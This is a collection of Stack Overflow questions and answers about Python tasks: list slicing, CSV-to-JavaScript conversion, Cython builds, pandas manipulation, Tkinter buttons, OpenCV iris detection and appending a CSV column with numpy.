<p>any one know how to retrieve section from this array:</p> <pre><code>a=[[1, 3, 2, 5, 7, 9, 4, 6, 8], [4, 9, 8, 2, 6, 1, 3, 7, 5], [7, 5, 6, 3, 8, 4, 2, 1, 9], [6, 4, 3, 1, 5, 8, 7, 9, 2], [5, 2, 1, 7, 9, 3, 8, 4, 6], [9, 8, 7, 4, 2, 6, 5, 3, 1], [2, 1, 4, 9, 3, 5, 6, 8, 7], [3, 6, 5, 8, 1, 7, 9, 2, 4], [8, 7, 9, 6, 4, 2, 1, 5, 3]] </code></pre> <p>I mean that i would like to retrieve section 3X3 ,for example,the top left one is:</p> <pre><code>[[1,3,2], [4,9,8], [7,5,6]] </code></pre> <p>the sections needed to be retrieved are :</p> <h1>left section</h1> <pre><code>[[0:3,0:3]],[[3:6,0:3]],[[6:9,0:3]] </code></pre> <h1>middle section</h1> <pre><code>[[0:3,3:6]],[[3:6,3:6]],[[6:9,3:6]] </code></pre> <h1>right section</h1> <pre><code>[[0:3,6:9]],[[3:6,6:9]],[[6:9,6:9]] </code></pre> <p>How to retrieve all these sections? Is it necessary to use numpy?</p>
0
2016-07-21T08:53:18Z
38,499,659
<p>Here is the answer, using list comprehension</p> <pre><code>&gt;&gt;&gt; [x[:3] for x in a[:3]]
[[1, 3, 2], [4, 9, 8], [7, 5, 6]]
</code></pre> <p>Left section :</p> <pre><code>[x[0:3] for x in a[0:3]]
[x[0:3] for x in a[3:6]]
[x[0:3] for x in a[6:9]]
</code></pre> <p>Middle section :</p> <pre><code>[x[3:6] for x in a[0:3]]
[x[3:6] for x in a[3:6]]
[x[3:6] for x in a[6:9]]
</code></pre> <p>Right section :</p> <pre><code>[x[6:9] for x in a[0:3]]
[x[6:9] for x in a[3:6]]
[x[6:9] for x in a[6:9]]
</code></pre> <p><code>a[i:j]</code> takes the lines from index i to j-1; <code>x[i:j]</code> takes the elements from index i to j-1 of said lines.</p> <p>To create 'flattened' lists, using the input from pwnsauce's comment :</p> <p>Left section :</p> <pre><code>[x for b in [x[0:3] for x in a[0:3]] for x in b]
[x for b in [x[0:3] for x in a[3:6]] for x in b]
[x for b in [x[0:3] for x in a[6:9]] for x in b]
</code></pre> <p>Middle section :</p> <pre><code>[x for b in [x[3:6] for x in a[0:3]] for x in b]
[x for b in [x[3:6] for x in a[3:6]] for x in b]
[x for b in [x[3:6] for x in a[6:9]] for x in b]
</code></pre> <p>Right section :</p> <pre><code>[x for b in [x[6:9] for x in a[0:3]] for x in b]
[x for b in [x[6:9] for x in a[3:6]] for x in b]
[x for b in [x[6:9] for x in a[6:9]] for x in b]
</code></pre>
1
2016-07-21T09:03:14Z
[ "python", "list", "numpy" ]
how to retrieve every section by 3X3?
38,499,475
<p>any one know how to retrieve section from this array:</p> <pre><code>a=[[1, 3, 2, 5, 7, 9, 4, 6, 8], [4, 9, 8, 2, 6, 1, 3, 7, 5], [7, 5, 6, 3, 8, 4, 2, 1, 9], [6, 4, 3, 1, 5, 8, 7, 9, 2], [5, 2, 1, 7, 9, 3, 8, 4, 6], [9, 8, 7, 4, 2, 6, 5, 3, 1], [2, 1, 4, 9, 3, 5, 6, 8, 7], [3, 6, 5, 8, 1, 7, 9, 2, 4], [8, 7, 9, 6, 4, 2, 1, 5, 3]] </code></pre> <p>I mean that i would like to retrieve section 3X3 ,for example,the top left one is:</p> <pre><code>[[1,3,2], [4,9,8], [7,5,6]] </code></pre> <p>the sections needed to be retrieved are :</p> <h1>left section</h1> <pre><code>[[0:3,0:3]],[[3:6,0:3]],[[6:9,0:3]] </code></pre> <h1>middle section</h1> <pre><code>[[0:3,3:6]],[[3:6,3:6]],[[6:9,3:6]] </code></pre> <h1>right section</h1> <pre><code>[[0:3,6:9]],[[3:6,6:9]],[[6:9,6:9]] </code></pre> <p>How to retrieve all these sections? Is it necessary to use numpy?</p>
0
2016-07-21T08:53:18Z
38,499,913
<p>Here's a vectorized approach using <code>reshaping</code> and permuting dimensions -</p> <pre><code>a.reshape(3,3,3,3).transpose(2,0,1,3).reshape(9,3,3)
</code></pre> <p>Sample run -</p> <pre><code>In [197]: a
Out[197]:
array([[1, 3, 2, 5, 7, 9, 4, 6, 8],
       [4, 9, 8, 2, 6, 1, 3, 7, 5],
       [7, 5, 6, 3, 8, 4, 2, 1, 9],
       [6, 4, 3, 1, 5, 8, 7, 9, 2],
       [5, 2, 1, 7, 9, 3, 8, 4, 6],
       [9, 8, 7, 4, 2, 6, 5, 3, 1],
       [2, 1, 4, 9, 3, 5, 6, 8, 7],
       [3, 6, 5, 8, 1, 7, 9, 2, 4],
       [8, 7, 9, 6, 4, 2, 1, 5, 3]])

In [198]: a.reshape(3,3,3,3).transpose(2,0,1,3).reshape(9,3,3)
Out[198]:
array([[[1, 3, 2],
        [4, 9, 8],
        [7, 5, 6]],

       [[6, 4, 3],
        [5, 2, 1],
        [9, 8, 7]],

       [[2, 1, 4],
        [3, 6, 5],
        [8, 7, 9]],
        ....
</code></pre> <p>If you need to flatten each such section/window, just tweak the last reshaping, like so -</p> <pre><code>In [199]: a.reshape(3,3,3,3).transpose(2,0,1,3).reshape(9,9)
Out[199]:
array([[1, 3, 2, 4, 9, 8, 7, 5, 6],
       [6, 4, 3, 5, 2, 1, 9, 8, 7],
       [2, 1, 4, 3, 6, 5, 8, 7, 9],
       [5, 7, 9, 2, 6, 1, 3, 8, 4],
       [1, 5, 8, 7, 9, 3, 4, 2, 6],
       [9, 3, 5, 8, 1, 7, 6, 4, 2],
       [4, 6, 8, 3, 7, 5, 2, 1, 9],
       [7, 9, 2, 8, 4, 6, 5, 3, 1],
       [6, 8, 7, 9, 2, 4, 1, 5, 3]])
</code></pre>
3
2016-07-21T09:14:15Z
[ "python", "list", "numpy" ]
how to retrieve every section by 3X3?
38,499,475
<p>any one know how to retrieve section from this array:</p> <pre><code>a=[[1, 3, 2, 5, 7, 9, 4, 6, 8], [4, 9, 8, 2, 6, 1, 3, 7, 5], [7, 5, 6, 3, 8, 4, 2, 1, 9], [6, 4, 3, 1, 5, 8, 7, 9, 2], [5, 2, 1, 7, 9, 3, 8, 4, 6], [9, 8, 7, 4, 2, 6, 5, 3, 1], [2, 1, 4, 9, 3, 5, 6, 8, 7], [3, 6, 5, 8, 1, 7, 9, 2, 4], [8, 7, 9, 6, 4, 2, 1, 5, 3]] </code></pre> <p>I mean that i would like to retrieve section 3X3 ,for example,the top left one is:</p> <pre><code>[[1,3,2], [4,9,8], [7,5,6]] </code></pre> <p>the sections needed to be retrieved are :</p> <h1>left section</h1> <pre><code>[[0:3,0:3]],[[3:6,0:3]],[[6:9,0:3]] </code></pre> <h1>middle section</h1> <pre><code>[[0:3,3:6]],[[3:6,3:6]],[[6:9,3:6]] </code></pre> <h1>right section</h1> <pre><code>[[0:3,6:9]],[[3:6,6:9]],[[6:9,6:9]] </code></pre> <p>How to retrieve all these sections? Is it necessary to use numpy?</p>
0
2016-07-21T08:53:18Z
38,500,002
<p>You can use something like this:</p> <pre><code>for i in range(0, len(a), 3):
    left_section = []
    middle_section = []
    right_section = []
    left_section.append(a[i][:3])
    left_section.append(a[i+1][:3])
    left_section.append(a[i+2][:3])
    middle_section.append(a[i][3:6])
    middle_section.append(a[i+1][3:6])
    middle_section.append(a[i+2][3:6])
    right_section.append(a[i][6:9])
    right_section.append(a[i+1][6:9])
    right_section.append(a[i+2][6:9])
    print(left_section)
    print(middle_section)
    print(right_section)
</code></pre> <p>OR</p> <pre><code>for i in range(0, len(a), 3):
    left_section = []
    middle_section = []
    right_section = []
    left_section.extend(a[i][:3])
    left_section.extend(a[i+1][:3])
    left_section.extend(a[i+2][:3])
    middle_section.extend(a[i][3:6])
    middle_section.extend(a[i+1][3:6])
    middle_section.extend(a[i+2][3:6])
    right_section.extend(a[i][6:9])
    right_section.extend(a[i+1][6:9])
    right_section.extend(a[i+2][6:9])
    print(left_section)
    print(middle_section)
    print(right_section)
</code></pre>
0
2016-07-21T09:17:41Z
[ "python", "list", "numpy" ]
how to retrieve every section by 3X3?
38,499,475
<p>any one know how to retrieve section from this array:</p> <pre><code>a=[[1, 3, 2, 5, 7, 9, 4, 6, 8], [4, 9, 8, 2, 6, 1, 3, 7, 5], [7, 5, 6, 3, 8, 4, 2, 1, 9], [6, 4, 3, 1, 5, 8, 7, 9, 2], [5, 2, 1, 7, 9, 3, 8, 4, 6], [9, 8, 7, 4, 2, 6, 5, 3, 1], [2, 1, 4, 9, 3, 5, 6, 8, 7], [3, 6, 5, 8, 1, 7, 9, 2, 4], [8, 7, 9, 6, 4, 2, 1, 5, 3]] </code></pre> <p>I mean that i would like to retrieve section 3X3 ,for example,the top left one is:</p> <pre><code>[[1,3,2], [4,9,8], [7,5,6]] </code></pre> <p>the sections needed to be retrieved are :</p> <h1>left section</h1> <pre><code>[[0:3,0:3]],[[3:6,0:3]],[[6:9,0:3]] </code></pre> <h1>middle section</h1> <pre><code>[[0:3,3:6]],[[3:6,3:6]],[[6:9,3:6]] </code></pre> <h1>right section</h1> <pre><code>[[0:3,6:9]],[[3:6,6:9]],[[6:9,6:9]] </code></pre> <p>How to retrieve all these sections? Is it necessary to use numpy?</p>
0
2016-07-21T08:53:18Z
38,501,887
<p><strong>Pure python way without the use of numpy:</strong></p> <p>As you need the lists flattened we use this function (as already mentioned):</p> <pre><code>def flatten_list(li): return [el for sub_li in li for el in sub_li] </code></pre> <p>We know we can retrieve the first section like this:</p> <pre><code>flatten_list([a[row][0:3] for row in range(3)]) # retrieves the first section &gt;&gt;&gt; [1, 3, 2, 4, 9, 8, 7, 5, 6] </code></pre> <p>and all left_sections like:</p> <pre><code>[flatten_list([a[row][0:3] for row in range(y*3, y*3+3)]) for y in range(3)] &gt;&gt;&gt; [[1, 3, 2, 4, 9, 8, 7, 5, 6], [6, 4, 3, 5, 2, 1, 9, 8, 7], [2, 1, 4, 3, 6, 5, 8, 7, 9]] </code></pre> <p>all together:</p> <pre><code>[[flatten_list([a[row][x*3:x*3+3] for row in range(y*3, y*3+3)]) for y in range(3)] for x in range(3)] &gt;&gt;&gt; [[[1, 3, 2, 4, 9, 8, 7, 5, 6], [6, 4, 3, 5, 2, 1, 9, 8, 7], [2, 1, 4, 3, 6, 5, 8, 7, 9]], [[5, 7, 9, 2, 6, 1, 3, 8, 4], [1, 5, 8, 7, 9, 3, 4, 2, 6], [9, 3, 5, 8, 1, 7, 6, 4, 2]], [[4, 6, 8, 3, 7, 5, 2, 1, 9], [7, 9, 2, 8, 4, 6, 5, 3, 1], [6, 8, 7, 9, 2, 4, 1, 5, 3]]] </code></pre>
0
2016-07-21T10:34:11Z
[ "python", "list", "numpy" ]
How do you convert a CSV file into a 2d array in a .js file?
38,499,489
<p>I have this csv file that looks a bit like this: </p> <pre><code>1,2,3 3,4,5 5,6,7 </code></pre> <p>and I need to convert it (preferably in python) to a .js file array that looks more like this: </p> <pre><code>var variable1 = [ [1,2,3], [3,4,5], [5,6,7], ]; </code></pre> <p>I'm very new to programming, so any guidance would be very helpful! Thanks so much!</p>
0
2016-07-21T08:54:04Z
38,499,542
<p>You have to open your csv file, then read the lines and write them in your js file.</p> <p>Basically:<br/> -> Open csv file<br/> -> Create js file<br/> -> Write 'var variable1 = [' in your js file<br/> -> Iterate on csv lines<br/> -> Write them in your js file<br/> -> Write '];' in your js file<br/> -> Close the files</p> <p>In python:</p> <pre><code>myJSFile = open('Path_to_your_js_file', 'w') myJSFile.write("var variable1 = [\n") myCSVFile = open('Path_to_your_csv_file', 'r') for line in myCSVFile.readlines(): myJSFile.write("[%s],\n" % line.strip()) myJSFile.write("];") myJSFile.close() myCSVFile.close() </code></pre> <p>That should do the work ;)</p>
0
2016-07-21T08:57:23Z
[ "javascript", "python", "arrays", "csv" ]
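As a variation on the answer above, the standard-library `csv` and `json` modules can do both the parsing and the JavaScript-array formatting: `json.dumps` of a list of lists is already valid JS array syntax. A sketch, using an in-memory string where you would read your real file:

```python
import csv
import io
import json

csv_text = "1,2,3\n3,4,5\n5,6,7\n"  # stands in for the contents of your .csv file
rows = [[int(value) for value in row] for row in csv.reader(io.StringIO(csv_text))]

js_source = "var variable1 = " + json.dumps(rows) + ";"
print(js_source)  # var variable1 = [[1, 2, 3], [3, 4, 5], [5, 6, 7]];
```

Writing `js_source` out with `open('myfile.js', 'w')` then gives a file you can load from a script tag.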
fatal error: 'mymodule.h' file not found - Cython compile fails to find header
38,499,517
<p>so I've been trying to get a simple script running, where I incorporate C-code into my python project using Cython 0.24 under MacOS 10.11.5 (El Capitan). I edit the code with PyCharm with Python Version 2.7.10. My setup.py looks like this</p> <pre><code>from distutils.core import setup from distutils.extension import Extension from Cython.Distutils import build_ext from Cython.Build import cythonize import os dirs = [os.getcwd()] ext = [Extension("hello_world", include_dirs=dirs, sources=["mymodule.c","hello_world.pyx"], depends=["mymodule.h"])] setup( name = "testing", cmdclass={'build_ext' : build_ext}, ext_modules = cythonize(ext) ) </code></pre> <p>It generates the hello_world.c just fine and also generates a build directory and an *.so file The *.pyx file contains the following definition, which obviously matches the definition in mymodule.h</p> <pre><code>cdef extern from "mymodule.h": cdef float MyFunction(float, float) </code></pre> <p>I tried the solution suggested here: <a href="http://stackoverflow.com/questions/22697440/cc-failed-with-exit-status-1-error-when-install-python-library">&quot;&#39;cc&#39; failed with exit status 1&quot; error when install python library</a></p> <pre><code>export CFLAGS=-Qunused-arguments export CPPFLAGS=-Qunused-arguments </code></pre> <p>and the custom extension solution already in above code came from here: <a href="http://stackoverflow.com/questions/31276470/compiling-cython-with-c-header-files-error">Compiling Cython with C header files error</a></p> <p>I also tried a MacOS specific solution suggested here, but that was just desperation: <a href="https://github.com/wesm/feather/issues/61" rel="nofollow">https://github.com/wesm/feather/issues/61</a></p> <pre><code>export MACOSX_DEPLOYMENT_TARGET=10.11 </code></pre> <p>But unfortunately it still won't work. I am sure that Cython is working properly because I implemented some functions beforehand and could call them just fine, when the implementation was in Cython. 
It's just including actual C code, where this problem occurs for me. </p> <p>I hope someone can help me, thanks in advance!</p> <p>edit: I get the following error messages</p> <pre><code>/Users/Me/.pyxbld/temp.macosx-10.11-intel-2.7/pyrex/hello_world.c:263:10: fatal error: 'mymodule.h' file not found #include "mymodule.h" ^ 1 error generated. Traceback (most recent call last): File "/Users/Me/Dropbox/Uni/MasterThesis/PythonProjects/cython_hello_world/main.py", line 3, in &lt;module&gt; import hello_world File "/Users/Me/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 445, in load_module language_level=self.language_level) File "/Users/Me/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 234, in load_module exec("raise exc, None, tb", {'exc': exc, 'tb': tb}) File "/Users/Me/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 216, in load_module inplace=build_inplace, language_level=language_level) File "/Users/Me/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 192, in build_module reload_support=pyxargs.reload_support) File "/Users/Me/Library/Python/2.7/lib/python/site-packages/pyximport/pyxbuild.py", line 102, in pyx_to_dll dist.run_commands() File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/distutils/dist.py", line 953, in run_commands self.run_command(cmd) File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/distutils/dist.py", line 972, in run_command cmd_obj.run() File "/Users/Me/Library/Python/2.7/lib/python/site-packages/Cython/Distutils/build_ext.py", line 164, in run _build_ext.build_ext.run(self) File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/distutils/command/build_ext.py", line 337, in run self.build_extensions() File "/Users/Me/Library/Python/2.7/lib/python/site-packages/Cython/Distutils/build_ext.py", line 172, in build_extensions self.build_extension(ext) File 
"/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/distutils/command/build_ext.py", line 496, in build_extension depends=ext.depends) File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/distutils/ccompiler.py", line 574, in compile self._compile(obj, src, ext, cc_args, extra_postargs, pp_opts) File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/distutils/unixccompiler.py", line 122, in _compile raise CompileError, msg ImportError: Building module hello_world failed: ["CompileError: command 'cc' failed with exit status 1\n"] </code></pre>
1
2016-07-21T08:56:14Z
38,505,376
<p>I solved it on my own. The problem was actually not in the code I posted here but in the code calling the function. I had the lines</p> <pre><code>import pyximport pyximport.install() </code></pre> <p>still in the code before calling the function in hello_world. This seems to have caused the problem. When I removed those two lines, the function could be called just fine.</p>
0
2016-07-21T13:18:08Z
[ "python", "c", "osx", "pycharm", "cython" ]
How to store missing date(15 min interval) points from csv into new file (15 minutes interval) -python 3.5
38,499,546
<p>I am new to Python, so some ideas on how to move forward would be much appreciated.</p> <p>Problem: I have 44 locations with production data per day (15-minute intervals) for the months from Dec to June. The total data points for one day should be 4224 (44 [locations] * 4 [15-min intervals] * 24 [hrs in day]), but that is not the case and some data is missing. I need to filter these dates out. </p> <p>A sample of the data I have in a csv file is shown below; the dates range from Dec to June: </p> <pre><code> datetime production 0 07-12-15 0:15 240 1 07-12-15 0:15 328 2 07-12-15 0:15 54 3 07-12-15 0:30 103 4 07-12-15 0:30 10 </code></pre> <p>This is just a sample to show the data format (the actual file goes up to June 2016); 0:15 is the 15-minute time step and 0 is the hour. </p> <p>My draft code:</p> <pre><code>df=pd.read_csv("file_path") df.set_index('datetime',inplace=True) startdate = pd.Timestamp('2015-12-1 00:15:00', tz='UTC') enddate = pd.Timestamp('2016-06-30 22:00:00', tz='UTC') daterange = pd.date_range(start=startdate, end=enddate, freq='15T', tz='UTC') for row in df.iterrows(): for single_date in daterange: if single_date == 4224: print("all fine") else: print (single_date) </code></pre> <p>I am still thinking about the selection of date.</p>
-10
2016-07-21T08:57:42Z
38,501,900
<p>Try this:</p> <pre><code>In [16]: df.ix[df.groupby(df['datetime'].dt.date)['production'].transform('nunique') &lt; 44 * 4 * 24, 'datetime'].dt.date.unique() Out[16]: array([datetime.date(2015, 12, 7)], dtype=object) </code></pre> <p>This will give you all rows for the "problematic" days:</p> <pre><code>df[df.groupby(df['datetime'].dt.date)['production'].transform('nunique') &lt; 44 * 4 * 24] </code></pre> <p>PS: there is a good reason why people asked you for a good reproducible sample data set - with the one you have provided, it's hardly possible to tell whether the code is working correctly or not... </p>
0
2016-07-21T10:34:39Z
[ "python", "pandas", "dataframe" ]
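For the underlying goal of finding which 15-minute timestamps are absent, pandas can also compare the actual datetimes against a complete `date_range`. A minimal sketch with toy data (five consecutive stamps with one slot deliberately removed, standing in for the real file):

```python
import pandas as pd

# Toy frame: five consecutive 15-minute stamps with the third one removed
idx = pd.date_range("2015-12-07 00:15", periods=5, freq="15min")
df = pd.DataFrame({"datetime": idx.delete(2),
                   "production": [240, 328, 103, 10]})

# Build the full expected grid and take the set difference
expected = pd.date_range(df["datetime"].min(), df["datetime"].max(), freq="15min")
missing = expected.difference(pd.DatetimeIndex(df["datetime"]))
print(missing)  # the absent 15-minute timestamps
```

The resulting `missing` index can then be written to a new file with `missing.to_series().to_csv(...)`.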
Converting all occurrence of True/False to 1/0 in a dataframe with mixed datatype
38,499,747
<p>I have a dataframe that has about 100 columns; there are some boolean columns and some character columns. I want to replace all boolean True/False values (and also -1) with 1/0, applying it to the whole dataframe instead of a single column.</p> <p>I saw some solutions here, like converting a column to integer, but I want to avoid going through 100s of columns one by one.</p> <p>Here is something I tried unsuccessfully:</p> <pre><code>test.applymap(lambda x: 1 if x=='True' else x) test.applymap(lambda x: 0 if x=='False' else x) </code></pre> <p>But the dataframe test still has True/False values.</p>
0
2016-07-21T09:07:12Z
38,499,855
<p><code>applymap</code> is not in-place; it returns a new dataframe that you have to assign back.</p> <p>The correct way:</p> <pre><code>test = test.applymap(lambda x: 1 if x == True else x) test = test.applymap(lambda x: 0 if x == False else x) </code></pre> <p>or, chained in one statement:</p> <pre><code>test = test.applymap(lambda x: 1 if x == True else x).applymap(lambda x: 0 if x == False else x) </code></pre> <p>(Note that <code>applymap</code> has no <code>inplace</code> argument.)</p> <p><br/></p> <p>Although <code>replace</code> seems the best way of achieving this:</p> <pre><code>test.replace({True: 1, False: 0}, inplace=True) </code></pre>
1
2016-07-21T09:11:30Z
[ "python", "data-manipulation" ]
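To see the `replace` approach from the answer above on a small mixed-dtype frame (toy data standing in for the asker's 100-column dataframe):

```python
import pandas as pd

test = pd.DataFrame({"flag": [True, False, True],
                     "name": ["a", "b", "c"]})

# Map booleans across the whole frame in one call;
# non-boolean columns such as "name" are left untouched.
converted = test.replace({True: 1, False: 0})
print(converted)
```

This avoids touching each of the 100 columns individually, since `replace` with a dict applies to every column at once.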
How to use pandas apply function on all columns of some rows of data frame
38,499,890
<p>I have a <code>dataframe</code>. I want to replace the values of all columns of some rows with a default value. Is there a way to do this via the <code>pandas apply</code> function?</p> <p>Here is the dataframe:</p> <pre><code>import pandas as pd temp=pd.DataFrame({'a':[1,2,3,4,5,6],'b':[2,3,4,5,6,7],'c':['p','q','r','s','t','u']}) mylist=['p','t'] </code></pre> <p>How do I replace the values in columns <code>a</code> and <code>b</code> with the default value 0, where the value of column <code>c</code> is in <code>mylist</code>?</p> <p>Is there a way to do this using pandas functionality, avoiding for loops?</p>
1
2016-07-21T09:12:45Z
38,499,928
<p>Use <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.isin.html" rel="nofollow"><code>isin</code></a> to create a boolean mask and use <code>loc</code> to set the rows that meet the condition to the desired new value:</p> <pre><code>In [37]: temp.loc[temp['c'].isin(mylist),['a','b']] = 0 temp Out[37]: a b c 0 0 0 p 1 2 3 q 2 3 4 r 3 4 5 s 4 0 0 t 5 6 7 u </code></pre> <p>result of the inner <code>isin</code>:</p> <pre><code>In [38]: temp['c'].isin(mylist) Out[38]: 0 True 1 False 2 False 3 False 4 True 5 False Name: c, dtype: bool </code></pre>
2
2016-07-21T09:14:44Z
[ "python", "pandas", "data-manipulation" ]
How to use pandas apply function on all columns of some rows of data frame
38,499,890
<p>I have a <code>dataframe</code>. I want to replace the values of all columns of some rows with a default value. Is there a way to do this via the <code>pandas apply</code> function?</p> <p>Here is the dataframe:</p> <pre><code>import pandas as pd temp=pd.DataFrame({'a':[1,2,3,4,5,6],'b':[2,3,4,5,6,7],'c':['p','q','r','s','t','u']}) mylist=['p','t'] </code></pre> <p>How do I replace the values in columns <code>a</code> and <code>b</code> with the default value 0, where the value of column <code>c</code> is in <code>mylist</code>?</p> <p>Is there a way to do this using pandas functionality, avoiding for loops?</p>
1
2016-07-21T09:12:45Z
38,500,147
<p>NumPy based method would be to use <a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.in1d.html" rel="nofollow"><code>np.in1d</code></a> to get such a mask and use it like so -</p> <pre><code>mask = np.in1d(temp.c,mylist) temp.ix[mask,temp.columns!='c'] = 0 </code></pre> <p>This will replace in all columns except <code>'c'</code>. If you are looking to replace in specific columns, say <code>'a'</code> and <code>'b'</code>, edit the last line to -</p> <pre><code>temp.ix[mask,['a','b']] = 0 </code></pre>
1
2016-07-21T09:23:52Z
[ "python", "pandas", "data-manipulation" ]
Flask Socket IO encryption
38,499,954
<p>How do I encrypt everything that passes through the socket between my server and clients? I'm using Flask's socket.io on the server and Swift socket.io on the clients.</p>
-3
2016-07-21T09:15:59Z
38,502,220
<p>You should use the secure <code>wss://</code> (WebSockets over SSL/TLS) protocol instead of <code>ws://</code>. Just like <code>https://</code>, it is encrypted. Note that if your page is already served over <code>https://</code>, you can only use <code>wss://</code> anyway, since browsers block insecure WebSocket connections from secure pages.</p>
0
2016-07-21T10:49:05Z
[ "python", "swift", "encryption", "flask", "socket.io" ]
Python Tkinter buttons - no text
38,499,965
<p>I'm having a bit of a play with tkinter buttons. I'm wanting to insert some buttons into a clock script I have.</p> <p>Inserting the button Exit (3rd line from bottom) inserts a button OK, and the button works, but it refuses to show any text on the button.</p> <p>How can I show text on this button?</p> <pre><code>import sys if sys.version_info[0] == 2: from Tkinter import * import Tkinter as tk else: from tkinter import * import tkinter as tk from time import * fontsize=75 fontname="Comic Sans MS" #font name - use Fontlist script for names fontweight="bold" #"bold" for bold, "normal" for normal fontslant="roman" #"roman" for normal, "italic" for italics def quit(): clock.destroy() def getTime(): day = strftime("%A") date = strftime("%d %B %Y") time = strftime("%I:%M:%S %p") text.delete('1.0', END) #delete everything text.insert(INSERT, '\n','mid') text.insert(INSERT, day + '\n', 'mid') #insert new time and new line text.insert(INSERT, date + '\n', 'mid') text.insert(INSERT, time + '\n', 'mid') clock.after(900, getTime) #wait 0.9 sec and go again clock = tk.Tk() # make it cover the entire screen w= clock.winfo_screenwidth() h= clock.winfo_screenheight() clock.overrideredirect(1) clock.geometry("%dx%d+0+0" % (w, h)) clock.focus_set() # &lt;-- move focus to this widget clock.bind("&lt;Escape&gt;", lambda e: e.widget.quit()) text = Text(clock, font=(fontname, fontsize, fontweight, fontslant)) text.grid(column = 1, columnspan = 1, row = 2, rowspan = 1, sticky='') Exit = Button(clock, text="Close Tkinter Window", width = w, height = 1, command=quit).grid(row = 1, rowspan = 1, column = 1, columnspan = w) clock.after(900, getTime) clock.mainloop() </code></pre>
0
2016-07-21T09:16:28Z
38,510,629
<p>Sort of solved it. The button was showing text - it was just off the screen. Solved it by adjusting the width of the tkinter text window and the buttons.</p>
1
2016-07-21T17:23:36Z
[ "python", "tkinter" ]
Python Tkinter buttons - no text
38,499,965
<p>I'm having a bit of a play with tkinter buttons. I'm wanting to insert some buttons into a clock script I have.</p> <p>Inserting the button Exit (3rd line from bottom) inserts a button OK, and the button works, but it refuses to show any text on the button.</p> <p>How can I show text on this button?</p> <pre><code>import sys if sys.version_info[0] == 2: from Tkinter import * import Tkinter as tk else: from tkinter import * import tkinter as tk from time import * fontsize=75 fontname="Comic Sans MS" #font name - use Fontlist script for names fontweight="bold" #"bold" for bold, "normal" for normal fontslant="roman" #"roman" for normal, "italic" for italics def quit(): clock.destroy() def getTime(): day = strftime("%A") date = strftime("%d %B %Y") time = strftime("%I:%M:%S %p") text.delete('1.0', END) #delete everything text.insert(INSERT, '\n','mid') text.insert(INSERT, day + '\n', 'mid') #insert new time and new line text.insert(INSERT, date + '\n', 'mid') text.insert(INSERT, time + '\n', 'mid') clock.after(900, getTime) #wait 0.9 sec and go again clock = tk.Tk() # make it cover the entire screen w= clock.winfo_screenwidth() h= clock.winfo_screenheight() clock.overrideredirect(1) clock.geometry("%dx%d+0+0" % (w, h)) clock.focus_set() # &lt;-- move focus to this widget clock.bind("&lt;Escape&gt;", lambda e: e.widget.quit()) text = Text(clock, font=(fontname, fontsize, fontweight, fontslant)) text.grid(column = 1, columnspan = 1, row = 2, rowspan = 1, sticky='') Exit = Button(clock, text="Close Tkinter Window", width = w, height = 1, command=quit).grid(row = 1, rowspan = 1, column = 1, columnspan = w) clock.after(900, getTime) clock.mainloop() </code></pre>
0
2016-07-21T09:16:28Z
38,515,364
<p>The value of <code>w</code> (<code>clock.winfo_screenwidth()</code>) is in pixels, but a button's <code>width</code> option is measured in text units, so the button becomes far too wide and its centered label ends up off the screen. Change the button's width to a smaller number (200) and add <code>sticky=W</code> to the <code>grid</code> call so the text no longer slides out of view; the button will still cover the whole width of the parent window (as you wish). So here's what to replace:<br></p> <pre><code>Exit = Button(clock, text="Close Tkinter Window", width = 200, height = 1, command=quit).grid(row = 1, rowspan = 1, column = 1, columnspan = w, sticky=W) </code></pre>
0
2016-07-21T22:26:42Z
[ "python", "tkinter" ]
Webcam Iris Detection with Hough Circles in Python OpenCV
38,499,981
<p>I have managed to isolate a very specific bounding region for an eye with the help of dlib's facial landmark detector. However, I am now completely stumped on how to create a circular border around the iris itself. I have tried Canny edge detection followed by Hough circles, but Hough circles does not seem to be able to process the image, most likely due to the low resolution and partially obstructed iris (due to the eye lids of course). I have tried this with a higher resolution camera feed and it works, but due to the constraints of my project, it is not feasible to do this. Currently, this is the bounding region I have isolated. </p> <p>The first image is the eye looking straight at the webcam as shown below:</p> <p><a href="http://i.stack.imgur.com/xvY0M.png" rel="nofollow"><img src="http://i.stack.imgur.com/xvY0M.png" alt="enter image description here"></a></p> <p>The image below is the eye looking upwards:</p> <p><a href="http://i.stack.imgur.com/fOh8Y.png" rel="nofollow"><img src="http://i.stack.imgur.com/fOh8Y.png" alt="enter image description here"></a></p> <p>I am not looking for code, but if anyone could guide me as to what transformations on the image would be appropriate, I would greatly appreciate it.</p>
-1
2016-07-21T09:17:03Z
38,500,350
<p>You could apply a threshold to the region before running the edge detector, and then use the Hough circle transform. If this does not work, an alternative may be to find contours and analyse them with <code>cvFitEllipse</code>.</p>
0
2016-07-21T09:31:33Z
[ "python", "opencv", "image-processing", "hough-transform", "canny-operator" ]
How to add new column to existing csv file
38,500,090
<p>For instance, <strong>x</strong> is my data and <strong>r</strong> is the new data to be added.</p> <pre><code>import numpy as np x = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]], np.int32) np.savetxt("test.csv", x, fmt='%d', delimiter=',') r = [1,2,3] </code></pre> <p>How could I add it as a new column to that <strong>"test.csv"</strong>?</p>
0
2016-07-21T09:21:41Z
38,500,749
<p>You can insert a new column by using the <a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.insert.html" rel="nofollow">insert function</a> in numpy like so:</p> <pre><code>np.insert(x, 3, [r], axis=1) </code></pre> <p>Note that <code>np.insert</code> returns a new array; it does not modify <code>x</code> in place.</p>
1
2016-07-21T09:48:45Z
[ "python", "csv", "numpy", "append" ]
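Putting the answer above together with the original `savetxt` call (note that `np.insert` returns a new array rather than modifying `x` in place, so the result has to be captured and written out again):

```python
import numpy as np

x = np.array([[1, 2, 3],
              [4, 5, 6],
              [7, 8, 9]], np.int32)
r = [1, 2, 3]

out = np.insert(x, 3, r, axis=1)   # new array; x itself is unchanged
print(out)
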